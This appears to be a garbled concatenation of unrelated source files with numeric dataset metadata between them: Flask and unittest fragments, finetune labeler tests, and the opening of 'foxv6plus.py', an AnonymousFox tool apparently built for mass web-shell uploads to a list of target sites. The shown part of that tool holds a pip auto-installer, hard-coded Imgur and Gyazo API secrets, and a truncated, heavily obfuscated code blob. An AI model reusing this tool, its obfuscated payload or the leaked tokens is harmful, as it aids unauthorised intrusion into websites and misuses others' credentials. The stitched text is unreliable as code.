stacktrace: str = format_exc()
logging.getLogger(__name__).error(stacktrace)
result.update({
'status': 500,
'response': "Internal Server Error",
'stacktrace': stacktrace,
'method': request.method
})
result.update({'method': request.method})
return jsonify(result)
| 36.241935
| 84
| 0.498442
| 389
| 4,494
| 5.532134
| 0.164524
| 0.083643
| 0.167286
| 0.081784
| 0.889405
| 0.8829
| 0.8829
| 0.856877
| 0.810409
| 0.767658
| 0
| 0.035299
| 0.407432
| 4,494
| 123
| 85
| 36.536585
| 0.772813
| 0
| 0
| 0.817391
| 0
| 0
| 0.136182
| 0.009791
| 0
| 0
| 0
| 0
| 0
| 1
| 0.017391
| false
| 0
| 0.06087
| 0
| 0.095652
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1d2ffb986ec6f97d076bc7651421051475ff153d
| 3,978
|
py
|
Python
|
examples/manualQuagga/generate_general_configs_test.py
|
RS1999ent/miniNExT
|
1328ea38db507598a430e9f8b547dce06a4374bb
|
[
"MIT"
] | 1
|
2017-07-17T18:56:22.000Z
|
2017-07-17T18:56:22.000Z
|
examples/manualQuagga/generate_general_configs_test.py
|
RS1999ent/miniNExT_evolvability
|
1328ea38db507598a430e9f8b547dce06a4374bb
|
[
"MIT"
] | null | null | null |
examples/manualQuagga/generate_general_configs_test.py
|
RS1999ent/miniNExT_evolvability
|
1328ea38db507598a430e9f8b547dce06a4374bb
|
[
"MIT"
] | null | null | null |
import unittest
import quagga_config_pb2
import QuaggaTopo_pb2
from generate_general_configs import CreateGeneralConfigs
from google.protobuf.text_format import Merge
class GenerateGeneralConfigsTest(unittest.TestCase):
def testxCreateGeneralConfigsXOneHostXCorrectConfigDict(self):
#arrange
kHostList = [
"""
host_type : HT_QUAGGA
host_name: 'a1'
ip: '172.0.1.1'
lo_ip: '10.0.1.1'
as_num: 100
island_id : 1
protocol: 'wiser'
"""
]
kTopology = """"""
kCorrectGeneralConfigDict = {
'a1' : """
protocol_type : PT_WISER
island_id : 1
wiser_protocol_config {}
"""
}
correct_dictionary = {}
for hostname,text_proto in kCorrectGeneralConfigDict.iteritems():
tmp_generalprotocolconfig = quagga_config_pb2.Configuration()
Merge(text_proto, tmp_generalprotocolconfig)
correct_dictionary[hostname] = tmp_generalprotocolconfig.SerializeToString()
host_list = []
for host_string in kHostList:
tmp_host = QuaggaTopo_pb2.Host()
host_list.append(Merge(host_string, tmp_host))
topology = QuaggaTopo_pb2.Topology()
Merge(kTopology, topology)
generate_wiser_configs = (host_list, topology)
#act
result_configs_dict = CreateGeneralConfigs(host_list, topology)
#serialize protos for equality checking
assert_dict = {}
for hostname, generalprotocolconfig in result_configs_dict.iteritems():
assert_dict[hostname] = generalprotocolconfig.SerializeToString()
#assert
self.assertDictEqual(correct_dictionary, assert_dict)
def testxCreateGeneralConfigsXOneHostXCorrectConfigDict(self):
#arrange
kHostList = [
"""
host_type : HT_QUAGGA
host_name: 'a1'
ip: '172.0.1.1'
lo_ip: '10.0.1.1'
as_num: 100
island_id : 1
protocol: 'wiser'
""",
"""
host_type : HT_QUAGGA
host_name: 'b1'
ip: '172.0.1.1'
lo_ip: '10.0.1.1'
as_num: 200
island_id : 1
protocol: 'wiser'
"""
]
kTopology = """"""
kCorrectGeneralConfigDict = {
'a1' : """
protocol_type : PT_WISER
island_id : 1
island_member_ases : 200
wiser_protocol_config {}
""",
'b1' : """
protocol_type : PT_WISER
island_id : 1
island_member_ases : 100
wiser_protocol_config {}
"""
}
correct_dictionary = {}
for hostname,text_proto in kCorrectGeneralConfigDict.iteritems():
tmp_generalprotocolconfig = quagga_config_pb2.Configuration()
Merge(text_proto, tmp_generalprotocolconfig)
correct_dictionary[hostname] = tmp_generalprotocolconfig.SerializeToString()
host_list = []
for host_string in kHostList:
tmp_host = QuaggaTopo_pb2.Host()
host_list.append(Merge(host_string, tmp_host))
topology = QuaggaTopo_pb2.Topology()
Merge(kTopology, topology)
generate_wiser_configs = (host_list, topology)
#act
result_configs_dict = CreateGeneralConfigs(host_list, topology)
#serialize protos for equality checking
assert_dict = {}
for hostname, generalprotocolconfig in result_configs_dict.iteritems():
assert_dict[hostname] = generalprotocolconfig.SerializeToString()
#assert
self.assertDictEqual(correct_dictionary, assert_dict)
suite = unittest.TestLoader().loadTestsFromTestCase(GenerateGeneralConfigsTest)
runner = unittest.TextTestRunner()
runner.run(suite)
| 30.6
| 88
| 0.597536
| 358
| 3,978
| 6.357542
| 0.22067
| 0.02812
| 0.007909
| 0.02109
| 0.852373
| 0.852373
| 0.841828
| 0.841828
| 0.841828
| 0.841828
| 0
| 0.025213
| 0.322021
| 3,978
| 129
| 89
| 30.837209
| 0.818687
| 0.027149
| 0
| 0.753425
| 1
| 0
| 0.128237
| 0.019657
| 0
| 0
| 0
| 0
| 0.082192
| 1
| 0.027397
| false
| 0
| 0.068493
| 0
| 0.109589
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
1d335db1c69a203488652a93ed672117702b140b
| 171
|
py
|
Python
|
tests/core/test_shop_conn/test_wc.py
|
pypipet/pypipet
|
8c489e4a7992281fbb68b12e2627decf24f2facb
|
[
"MIT"
] | null | null | null |
tests/core/test_shop_conn/test_wc.py
|
pypipet/pypipet
|
8c489e4a7992281fbb68b12e2627decf24f2facb
|
[
"MIT"
] | null | null | null |
tests/core/test_shop_conn/test_wc.py
|
pypipet/pypipet
|
8c489e4a7992281fbb68b12e2627decf24f2facb
|
[
"MIT"
] | 1
|
2021-12-10T22:36:34.000Z
|
2021-12-10T22:36:34.000Z
|
import pytest
from pipet.core.shop_conn.wc import *
from pipet.core.transform.model_to_wc import *
from pipet.core.transform.wc_to_model import *
from pprint import pprint
| 34.2
| 46
| 0.830409
| 29
| 171
| 4.724138
| 0.413793
| 0.19708
| 0.284672
| 0.248175
| 0.437956
| 0.437956
| 0
| 0
| 0
| 0
| 0
| 0
| 0.099415
| 171
| 5
| 47
| 34.2
| 0.88961
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0.2
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
1d4320ecfcfc3020f43bd0ae992463784c68c2e0
| 15,573
|
py
|
Python
|
tests/test_group.py
|
IndicoDataSolutions/finetune-transformer-lm
|
3534658e5de281e5634c8481b0fb37635b0cb3af
|
[
"MIT"
] | null | null | null |
tests/test_group.py
|
IndicoDataSolutions/finetune-transformer-lm
|
3534658e5de281e5634c8481b0fb37635b0cb3af
|
[
"MIT"
] | null | null | null |
tests/test_group.py
|
IndicoDataSolutions/finetune-transformer-lm
|
3534658e5de281e5634c8481b0fb37635b0cb3af
|
[
"MIT"
] | null | null | null |
import os
import unittest
import logging
from copy import copy
from pathlib import Path
import codecs
import json
import random
import time
# required for tensorflow logging control
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import pytest
from pytest import approx
import tensorflow as tf
import numpy as np
from finetune.base_models.huggingface.models import HFT5
from finetune.target_models.grouping import (
GroupSequenceLabeler,
PipelineSequenceLabeler,
MultiCRFGroupSequenceLabeler,
MultiLogitGroupSequenceLabeler,
BROSLabeler,
JointBROSLabeler,
GroupRelationLabeler,
JointGroupRelationLabeler,
SequenceS2S,
GroupS2S,
JointS2S,
)
class TestGroupingLabelers(unittest.TestCase):
def test_nested_tagging(self):
model = GroupSequenceLabeler(class_weights="sqrt")
text = ("five percent (5%) \n " +
"fifty percent (50%) \n " +
"two percent (2%) \n " +
"nine percent (9%) \n " +
"three percent (3%) \n ")
labels = [
{'start': 0, 'end': 17, 'label': 'a', 'text': 'five percent (5%)'},
{'start': 20, 'end': 39, 'label': 'b', 'text': 'fifty percent (50%)'},
{'start': 42, 'end': 58, 'label': 'a', 'text': 'two percent (2%)'},
{'start': 61, 'end': 78, 'label': 'b', 'text': 'nine percent (9%)'},
{'start': 81, 'end': 99, 'label': 'a', 'text': 'three percent (3%)'},
]
groups = [
{"spans": [
{'start': 0, 'end': 39, 'text': 'five percent (5%) \n fifty percent (50%)'},
], 'label': None},
{"spans": [
{'start': 61, 'end': 99, 'text': 'nine percent (9%) \n three percent (3%)'},
], 'label': None}
]
labels = (labels, groups)
model.fit([text] * 30, [labels] * 30)
preds = model.predict([text])[0]
self.assertEqual(len(preds), 2)
self.assertEqual(len(preds[0]), 5)
self.assertEqual(len(preds[1]), 2)
for p in preds[0]:
del p["confidence"]
self.assertEqual(preds, labels)
def test_multi_crf_tagging(self):
model = MultiCRFGroupSequenceLabeler(crf_sequence_labeling=True,
class_weights="sqrt",
lr=5e-5)
text = ("five percent (5%) \n " +
"fifty percent (50%) \n " +
"two percent (2%) \n " +
"nine percent (9%) \n " +
"three percent (3%) \n ")
labels = [
{'start': 0, 'end': 17, 'label': 'a', 'text': 'five percent (5%)'},
{'start': 20, 'end': 39, 'label': 'b', 'text': 'fifty percent (50%)'},
{'start': 42, 'end': 58, 'label': 'a', 'text': 'two percent (2%)'},
{'start': 61, 'end': 78, 'label': 'b', 'text': 'nine percent (9%)'},
{'start': 81, 'end': 99, 'label': 'a', 'text': 'three percent (3%)'},
]
groups = [
{"spans": [
{'start': 0, 'end': 39, 'text': 'five percent (5%) \n fifty percent (50%)'},
], 'label': None},
{"spans": [
{'start': 61, 'end': 99, 'text': 'nine percent (9%) \n three percent (3%)'},
], 'label': None}
]
labels = (labels, groups)
model.fit([text] * 30, [labels] * 30)
preds = model.predict([text])[0]
for p in preds[0]:
del p["confidence"]
self.assertEqual(len(preds), 2)
self.assertEqual(len(preds[0]), 5)
self.assertEqual(len(preds[1]), 2)
self.assertEqual(preds, labels)
def test_multi_logit_tagging(self):
model = MultiLogitGroupSequenceLabeler(crf_sequence_labeling=True,
class_weights="sqrt")
text = ("five percent (5%) \n " +
"fifty percent (50%) \n " +
"two percent (2%) \n " +
"nine percent (9%) \n " +
"three percent (3%) \n ")
labels = [
{'start': 0, 'end': 17, 'label': 'a', 'text': 'five percent (5%)'},
{'start': 20, 'end': 39, 'label': 'b', 'text': 'fifty percent (50%)'},
{'start': 42, 'end': 58, 'label': 'a', 'text': 'two percent (2%)'},
{'start': 61, 'end': 78, 'label': 'b', 'text': 'nine percent (9%)'},
{'start': 81, 'end': 99, 'label': 'a', 'text': 'three percent (3%)'},
]
groups = [
{"spans": [
{'start': 0, 'end': 39, 'text': 'five percent (5%) \n fifty percent (50%)'},
], 'label': None},
{"spans": [
{'start': 61, 'end': 99, 'text': 'nine percent (9%) \n three percent (3%)'},
], 'label': None}
]
labels = (labels, groups)
model.fit([text] * 30, [labels] * 30)
preds = model.predict([text])[0]
self.assertEqual(len(preds), 2)
self.assertEqual(len(preds[0]), 5)
self.assertEqual(len(preds[1]), 2)
for p in preds[0]:
del p["confidence"]
self.assertEqual(preds, labels)
def test_pipeline_tagging(self):
model = PipelineSequenceLabeler(class_weights="sqrt")
text = ("five percent (5%) \n " +
"fifty percent (50%) \n " +
"two percent (2%) \n " +
"nine percent (9%) \n " +
"three percent (3%) \n ")
labels = [
{'start': 0, 'end': 17, 'label': 'a', 'text': 'five percent (5%)'},
{'start': 20, 'end': 39, 'label': 'b', 'text': 'fifty percent (50%)'},
{'start': 42, 'end': 58, 'label': 'a', 'text': 'two percent (2%)'},
{'start': 61, 'end': 78, 'label': 'b', 'text': 'nine percent (9%)'},
{'start': 81, 'end': 99, 'label': 'a', 'text': 'three percent (3%)'},
]
groups = [
{"spans": [
{'start': 0, 'end': 39, 'text': 'five percent (5%) \n fifty percent (50%)'},
], 'label': None},
{"spans": [
{'start': 61, 'end': 99, 'text': 'nine percent (9%) \n three percent (3%)'},
], 'label': None}
]
labels = (labels, groups)
model.fit([text] * 30, [labels] * 30)
preds = model.predict([text])[0]
self.assertEqual(len(preds), 2)
self.assertEqual(preds, labels[1])
def test_bros_tagging(self):
model = BROSLabeler(lr=8e-5, class_weights="sqrt")
text = ("five percent (5%) \n " +
"fifty percent (50%) \n " +
"two percent (2%) \n " +
"nine percent (9%) \n " +
"three percent (3%) \n ")
labels = [
{'start': 0, 'end': 17, 'label': 'a', 'text': 'five percent (5%)'},
{'start': 20, 'end': 39, 'label': 'b', 'text': 'fifty percent (50%)'},
{'start': 42, 'end': 58, 'label': 'a', 'text': 'two percent (2%)'},
{'start': 61, 'end': 78, 'label': 'b', 'text': 'nine percent (9%)'},
{'start': 81, 'end': 99, 'label': 'a', 'text': 'three percent (3%)'},
]
groups = [
{"spans": [
{'start': 0, 'end': 39, 'text': 'five percent (5%) \n fifty percent (50%)'},
], 'label': None},
{"spans": [
{'start': 61, 'end': 99, 'text': 'nine percent (9%) \n three percent (3%)'},
], 'label': None}
]
labels = (labels, groups)
model.fit([text] * 30, [labels] * 30)
preds = model.predict([text])[0]
self.assertEqual(len(preds), 2)
self.assertEqual(preds, labels[1])
def test_joint_bros_tagging(self):
model = JointBROSLabeler(lr=8e-5, n_epochs=16, class_weights="sqrt")
text = ("five percent (5%) \n " +
"fifty percent (50%) \n " +
"two percent (2%) \n " +
"nine percent (9%) \n " +
"three percent (3%) \n ")
labels = [
{'start': 0, 'end': 17, 'label': 'a', 'text': 'five percent (5%)'},
{'start': 20, 'end': 39, 'label': 'b', 'text': 'fifty percent (50%)'},
{'start': 42, 'end': 58, 'label': 'a', 'text': 'two percent (2%)'},
{'start': 61, 'end': 78, 'label': 'b', 'text': 'nine percent (9%)'},
{'start': 81, 'end': 99, 'label': 'a', 'text': 'three percent (3%)'},
]
groups = [
{"spans": [
{'start': 0, 'end': 39, 'text': 'five percent (5%) \n fifty percent (50%)'},
], 'label': None},
{"spans": [
{'start': 61, 'end': 99, 'text': 'nine percent (9%) \n three percent (3%)'},
], 'label': None}
]
labels = (labels, groups)
model.fit([text] * 30, [labels] * 30)
preds = model.predict([text])[0]
for p in preds[0]:
del p["confidence"]
self.assertEqual(len(preds), 2)
self.assertEqual(len(preds[0]), 5)
self.assertEqual(len(preds[1]), 2)
self.assertEqual(preds, labels)
def test_group_relation_tagging(self):
model = GroupRelationLabeler(lr=8e-5, class_weights="sqrt")
text = ("five percent (5%) \n " +
"fifty percent (50%) \n " +
"two percent (2%) \n " +
"nine percent (9%) \n " +
"three percent (3%) \n ")
labels = [
{'start': 0, 'end': 17, 'label': 'a', 'text': 'five percent (5%)'},
{'start': 20, 'end': 39, 'label': 'b', 'text': 'fifty percent (50%)'},
{'start': 42, 'end': 58, 'label': 'a', 'text': 'two percent (2%)'},
{'start': 61, 'end': 78, 'label': 'b', 'text': 'nine percent (9%)'},
{'start': 81, 'end': 99, 'label': 'a', 'text': 'three percent (3%)'},
]
groups = [
{"spans": [
{'start': 0, 'end': 39, 'text': 'five percent (5%) \n fifty percent (50%)'},
], 'label': None},
{"spans": [
{'start': 61, 'end': 99, 'text': 'nine percent (9%) \n three percent (3%)'},
], 'label': None}
]
labels = (labels, groups)
model.fit([text] * 30, [labels] * 30)
preds = model.predict([text])[0]
self.assertEqual(len(preds), 2)
self.assertEqual(preds, labels[1])
def test_joint_group_relation_tagging(self):
model = JointGroupRelationLabeler(lr=8e-5,
group_loss_weight=600,
class_weights="sqrt")
text = ("five percent (5%) \n " +
"fifty percent (50%) \n " +
"two percent (2%) \n " +
"nine percent (9%) \n " +
"three percent (3%) \n ")
labels = [
{'start': 0, 'end': 17, 'label': 'a', 'text': 'five percent (5%)'},
{'start': 20, 'end': 39, 'label': 'b', 'text': 'fifty percent (50%)'},
{'start': 42, 'end': 58, 'label': 'a', 'text': 'two percent (2%)'},
{'start': 61, 'end': 78, 'label': 'b', 'text': 'nine percent (9%)'},
{'start': 81, 'end': 99, 'label': 'a', 'text': 'three percent (3%)'},
]
groups = [
{"spans": [
{'start': 0, 'end': 39, 'text': 'five percent (5%) \n fifty percent (50%)'},
], 'label': None},
{"spans": [
{'start': 61, 'end': 99, 'text': 'nine percent (9%) \n three percent (3%)'},
], 'label': None}
]
labels = (labels, groups)
model.fit([text] * 30, [labels] * 30)
preds = model.predict([text])[0]
for p in preds[0]:
del p["confidence"]
self.assertEqual(len(preds), 2)
self.assertEqual(len(preds[0]), 5)
self.assertEqual(len(preds[1]), 2)
self.assertEqual(preds, labels)
def test_t5_sequence_tagging(self):
model = SequenceS2S(base_model=HFT5, n_epochs=8)
text = ("five percent (5%) \n " +
"fifty percent (50%) \n " +
"two percent (2%) \n " +
"nine percent (9%) \n " +
"three percent (3%) \n ")
labels = [
{'start': 0, 'end': 17, 'label': 'a', 'text': 'five percent (5%)'},
{'start': 20, 'end': 39, 'label': 'b', 'text': 'fifty percent (50%)'},
{'start': 42, 'end': 58, 'label': 'a', 'text': 'two percent (2%)'},
{'start': 61, 'end': 78, 'label': 'b', 'text': 'nine percent (9%)'},
{'start': 81, 'end': 99, 'label': 'a', 'text': 'three percent (3%)'},
]
model.fit([text] * 30, [labels] * 30)
preds = model.predict([text])[0]
self.assertEqual(len(preds), 5)
self.assertEqual(preds, labels)
def test_t5_group_tagging(self):
model = GroupS2S(base_model=HFT5, n_epochs=8)
text = ("five percent (5%) \n " +
"fifty percent (50%) \n " +
"two percent (2%) \n " +
"nine percent (9%) \n " +
"three percent (3%) \n ")
labels = [
{'start': 0, 'end': 17, 'label': 'a', 'text': 'five percent (5%)'},
{'start': 20, 'end': 39, 'label': 'b', 'text': 'fifty percent (50%)'},
{'start': 42, 'end': 58, 'label': 'a', 'text': 'two percent (2%)'},
{'start': 61, 'end': 78, 'label': 'b', 'text': 'nine percent (9%)'},
{'start': 81, 'end': 99, 'label': 'a', 'text': 'three percent (3%)'},
]
groups = [
{"spans": [
{'start': 0, 'end': 39, 'text': 'five percent (5%) \n fifty percent (50%)'},
], 'label': None},
{"spans": [
{'start': 61, 'end': 99, 'text': 'nine percent (9%) \n three percent (3%)'},
], 'label': None}
]
labels = (labels, groups)
model.fit([text] * 30, [labels] * 30)
preds = model.predict([text])[0]
self.assertEqual(len(preds), 2)
self.assertEqual(preds, groups)
def test_t5_joint_tagging(self):
model = JointS2S(base_model=HFT5, n_epochs=16)
text = ("five percent (5%) \n " +
"fifty percent (50%) \n " +
"two percent (2%) \n " +
"nine percent (9%) \n " +
"three percent (3%) \n ")
labels = [
{'start': 0, 'end': 17, 'label': 'a', 'text': 'five percent (5%)'},
{'start': 20, 'end': 39, 'label': 'b', 'text': 'fifty percent (50%)'},
{'start': 42, 'end': 58, 'label': 'a', 'text': 'two percent (2%)'},
{'start': 61, 'end': 78, 'label': 'b', 'text': 'nine percent (9%)'},
{'start': 81, 'end': 99, 'label': 'a', 'text': 'three percent (3%)'},
]
groups = [
{"spans": [
{'start': 0, 'end': 39, 'text': 'five percent (5%) \n fifty percent (50%)'},
], 'label': None},
{"spans": [
{'start': 61, 'end': 99, 'text': 'nine percent (9%) \n three percent (3%)'},
], 'label': None}
]
all_labels = (labels, groups)
model.fit([text] * 30, [all_labels] * 30)
label_preds, group_preds = model.predict([text])[0]
self.assertEqual(len(label_preds), 5)
self.assertEqual(labels, label_preds)
self.assertEqual(len(group_preds), 2)
self.assertEqual(groups, group_preds)
| 41.862903
| 92
| 0.454697
| 1,709
| 15,573
| 4.10474
| 0.070802
| 0.072701
| 0.047042
| 0.072986
| 0.833785
| 0.822666
| 0.822666
| 0.802566
| 0.796864
| 0.796864
| 0
| 0.057469
| 0.341874
| 15,573
| 371
| 93
| 41.975741
| 0.626988
| 0.002504
| 0
| 0.755814
| 0
| 0
| 0.286956
| 0
| 0
| 0
| 0
| 0
| 0.098837
| 1
| 0.031977
| false
| 0
| 0.043605
| 0
| 0.078488
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1d57d1c6fe271dc7a947602662334a6fe9a625de
| 127
|
py
|
Python
|
elf/types/base/struct/__init__.py
|
Valmarelox/elftoolsng
|
99c3f4913a7e477007b1d81df83274d7657bf693
|
[
"MIT"
] | null | null | null |
elf/types/base/struct/__init__.py
|
Valmarelox/elftoolsng
|
99c3f4913a7e477007b1d81df83274d7657bf693
|
[
"MIT"
] | null | null | null |
elf/types/base/struct/__init__.py
|
Valmarelox/elftoolsng
|
99c3f4913a7e477007b1d81df83274d7657bf693
|
[
"MIT"
] | null | null | null |
from elf.types.base.struct.elf_struct_property import ElfStructProperty
from elf.types.base.struct.elf_struct import ElfStruct
| 42.333333
| 71
| 0.874016
| 19
| 127
| 5.684211
| 0.473684
| 0.12963
| 0.222222
| 0.296296
| 0.574074
| 0.574074
| 0.574074
| 0
| 0
| 0
| 0
| 0
| 0.062992
| 127
| 2
| 72
| 63.5
| 0.907563
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
1da09581ba1e0dae121b253e9ba6498fa03383a7
| 317,376
|
py
|
Python
|
shell-upload-plugin-main/foxv6plus.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | 2
|
2021-11-17T03:35:03.000Z
|
2021-12-08T06:00:31.000Z
|
shell-upload-plugin-main/foxv6plus.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | null | null | null |
shell-upload-plugin-main/foxv6plus.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | 2
|
2021-11-05T18:07:48.000Z
|
2022-02-24T21:25:07.000Z
|
#donwload python (Preferred Python 2.7.14) => https://www.python.org/downloads/release/python-2714/
#install requests, how ? => https://anonymousfox.io/_@info/requests.txt
#install colorama, how ? => https://anonymousfox.io/_@info/colorama.txt
#install selenium, how ? => https://anonymousfox.io/_@info/selenium.txt
#install imgurpython, how ? => https://anonymousfox.io/_@info/imgurpython.txt
#get Chrome Driver, how ? => https://anonymousfox.io/_@info/ChromeDriver.txt
#run by Double Click on v6p.py
#OR run like (Windows) => v6p.py lists.txt
#OR run like (python 2.7) => python v6p.py lists.txt
#OR run like (python 3) => python3 v6p.py lists.txt
# Notice : Be careful not to use any similar script !! Some sons of the bitchs stole the script for the v1 source and v2 source ...
# and they attributed our efforts to them! In order to protect our efforts, we have already encrypted v3 , v4, v5 , v6 and v6+ script,
# and we will disable all previous versions!
def modelsInstaller():
try :
models = ['requests', 'colorama', 'mechanize', 'selenium', 'imgurpython', 'python-gyazo']
for model in models:
try:
if (sys.version_info[0] < 3):
os.system('cd C:\Python27\Scripts & pip install {}'.format(model))
else :
os.system('py -m pip install {}'.format(model))
print (' ')
print (' [+] {} has been installed successfully, Restart the program.'.format(model))
print (' ')
except:
print (' [-] Install {} manually.'.format(model))
print (' ')
except:
pass
import re, sys, os, random, string, time, ssl, json, socket, base64
from time import time as timer
try :
import requests, mechanize, selenium, imgurpython, gyazo
from colorama import Fore
from colorama import init
except :
modelsInstaller()
init(autoreset=True)
requests.packages.urllib3.disable_warnings()
fr = Fore.RED
fc = Fore.CYAN
fw = Fore.WHITE
fg = Fore.GREEN
fm = Fore.MAGENTA
fy = Fore.YELLOW
fb = Fore.BLUE
def URLdomain_Fox(site):
if (site.startswith("http://")) :
site = site.replace("http://", "")
elif (site.startswith("https://")) :
site = site.replace("https://", "")
if ('www.' in site) :
site = site.replace("www.", "")
if ('/' in site):
site = site.rstrip()
site = site.split('/')[0]
return site
def URL_FOX(site):
if (site.startswith("http://")) :
site = site.replace("http://", "")
p = 'http://'
elif (site.startswith("https://")) :
site = site.replace("https://", "")
p = 'https://'
else :
p = 'http://'
if ('/' in site):
site = site.rstrip()
site = site.split('/')[0]
return p+site
def USER_FOX(site):
if (site.startswith("http://")) :
site = site.replace("http://","")
elif (site.startswith("https://")) :
site = site.replace("https://","")
site = site.rstrip()
site = site.split('/')[0]
if ('www.' in site) :
site = site.replace("www.", "")
site = site.split('.')[0]
return site
def input_Fox(txt):
try :
if (sys.version_info[0] < 3):
return raw_input(txt).strip()
else :
sys.stdout.write(txt)
return input()
except:
return False
def file_get_contents_Fox(filename):
with open(filename) as f:
return f.read()
def shuffle_Fox(arr):
for n in range(len(arr) - 1):
rnd = random.randint(0, (len(arr) - 1))
val1 = arr[rnd]
val2 = arr[rnd - 1]
arr[rnd - 1] = val1
arr[rnd] = val2
return arr
def shellPath_Fox(url, filename, ty):
try:
if('?' in url):
url = str(url.split('?')[0])
if(ty == 1):
shell_path = url.replace(str(url.split('/')[-1]), filename)
if (ty == 2):
shell_path = URL_FOX(url) + '/' + filename
return shell_path
except:
return False
def random_Fox(length):
letters = string.ascii_lowercase
return ''.join(random.choice(letters) for i in range(length))
def imgur_Fox(path):
try:
from imgurpython import ImgurClient
client_id = '397c46443e4a952'
client_secret = '0033c37d22a540a195b8b3df1cfd725db1076401'
client_Fox = ImgurClient(client_id, client_secret)
items_Fox = client_Fox.upload_from_path('screenshots/'+path, config=None, anon=True)
if (sys.version_info[0] < 3):
urlpng_Fox = re.findall(re.compile('u\'link\': u\'(.*)\','), str(items_Fox))[0]
else :
urlpng_Fox = re.findall(re.compile('\'link\': \'(.*)\','), str(items_Fox))[0]
if ("'" in urlpng_Fox) :
urlpng_Fox = urlpng_Fox.split("'")[0]
return urlpng_Fox
except:
return False
def gyazo_Fox(path):
try :
from gyazo import Api
client_Fox = Api(access_token='1t00j2_Qx6Y3HYNhteW5HvTc0ks9Xxjoc0Rjqoxk1t0')
with open('screenshots/'+path, 'rb') as fox:
image_Fox = client_Fox.upload_image(fox)
urlpng_Fox = re.findall(re.compile('"url": "(.*)\.png"'), str(image_Fox.to_json()))[0] + '.png'
return urlpng_Fox
except :
print('\n [!] Error, You have to change your IP by VPN.\n')
return False
def content_Fox(req):
if (sys.version_info[0] < 3):
try:
try:
return str(req.content)
except:
try:
return str(req.content.encode('utf-8'))
except:
return str(req.content.decode('utf-8'))
except:
return str(req.text)
else:
try:
try:
return str(req.content.decode('utf-8'))
except:
try:
return str(req.content.encode('utf-8'))
except:
return str(req.text)
except:
return str(req.content)
def getError(ty):
if (ty == 1):
print(' [-] {}Make sure you are connected to the internet.'.format(fr))
print(' [-] {}OR You must to change your IP/RDP.'.format(fr))
else:
print(' [-] {}You must to change your IP/RDP.'.format(fr))
print(' [!] Or Do a report for AnonymousFox, Telegram: {}@Anonymous_F0x\n'.format(fc))
exit(0)
_vsqmdgoqxczl=((()==[])+(()==[]));__btvtxbozjofb=(_vsqmdgoqxczl**_vsqmdgoqxczl);___tphcagehraku=((__btvtxbozjofb<<__btvtxbozjofb));____nthikhotjssa=((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)));_____chsqpefvmbxg=((__btvtxbozjofb<<____nthikhotjssa));______ttwxoebqsbsu=((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)));_______tvhkobpbumlt=str("".join(chr(__RSV) for __RSV in [((____nthikhotjssa<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+(_____chsqpefvmbxg<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+(______ttwxoebqsbsu<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(____nthikhotjssa+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(____nthikhotjssa+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),((_vsqmdgoqxczl**_vsqmdgoqxczl)+___tphcagehraku+_____chsqpefvmbxg+______ttwxoebqsbsu+(((((__btvtxbozjofb<<____nthikhotjssa))<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))),(___tphcagehraku+(((___tphcagehraku<<(_vsqmdgoqxczl**_vsqmdgoqxczl)))<<(_vsqmdgoqxczl**_vsqmdgoqxczl))+_____chsqpefvmbx